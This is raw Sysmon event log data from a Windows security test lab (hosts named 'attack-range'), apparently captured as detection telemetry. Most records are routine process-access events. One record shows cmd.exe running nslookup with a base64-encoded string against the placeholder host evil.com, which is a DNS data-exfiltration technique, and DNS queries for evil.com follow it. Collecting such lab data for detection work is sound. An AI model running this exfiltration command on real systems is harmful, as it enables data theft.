Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044880Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18FE-629A-3407-000000006002}1844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044879Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-18FE-629A-3407-000000006002}1844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044878Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.362{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=AE669BE79F0EA7AD259161375149B9FC,SHA256=687F68FEF6103F9C03D425D6E019C4DE97ED5E4B986BAC7227A0C2A583E54314,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044877Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.300{0A5DF930-18FE-629A-3307-000000006002}3642912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044876Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.128{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18FE-629A-3307-000000006002}364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044875Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.128{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044874Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.128{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044873Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.128{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044872Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.128{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044871Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.128{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044870Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.128{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044869Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.128{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044868Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.128{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044867Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.128{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044866Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.128{0A5DF930-E35B-6299-0500-000000006002}412428C:\Windows\system32\csrss.exe{0A5DF930-18FE-629A-3307-000000006002}364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044865Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.128{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18FE-629A-3307-000000006002}364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044864Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.130{0A5DF930-18FE-629A-3307-000000006002}364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044863Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.018{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69A414D5EF16E96022B52A6D97033F92,SHA256=293DD772FA3CB1CF5AB07F27E795E7F701FC767E8DBD02C0A5751E5577435E29,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.984{2E1864BB-18FF-629A-7646-000000005F02}76641700C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-7746-000000005F02}312C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.984{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.984{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-7746-000000005F02}312C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.984{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.984{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.984{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.984{2E1864BB-18FF-629A-7546-000000005F02}61724036C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-7746-000000005F02}312C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.984{2E1864BB-18FF-629A-7746-000000005F02}312C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-7546-000000005F02}6172C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlracod.tmp 2>&1 10341000x8000000000000000215868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.952{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-7646-000000005F02}7664C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.952{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-7646-000000005F02}7664C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.937{2E1864BB-18FF-629A-7646-000000005F02}76641700C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-7546-000000005F02}6172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000215865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.124{00000000-0000-0000-0000-000000000000}988evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.058{00000000-0000-0000-0000-000000000000}5944evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 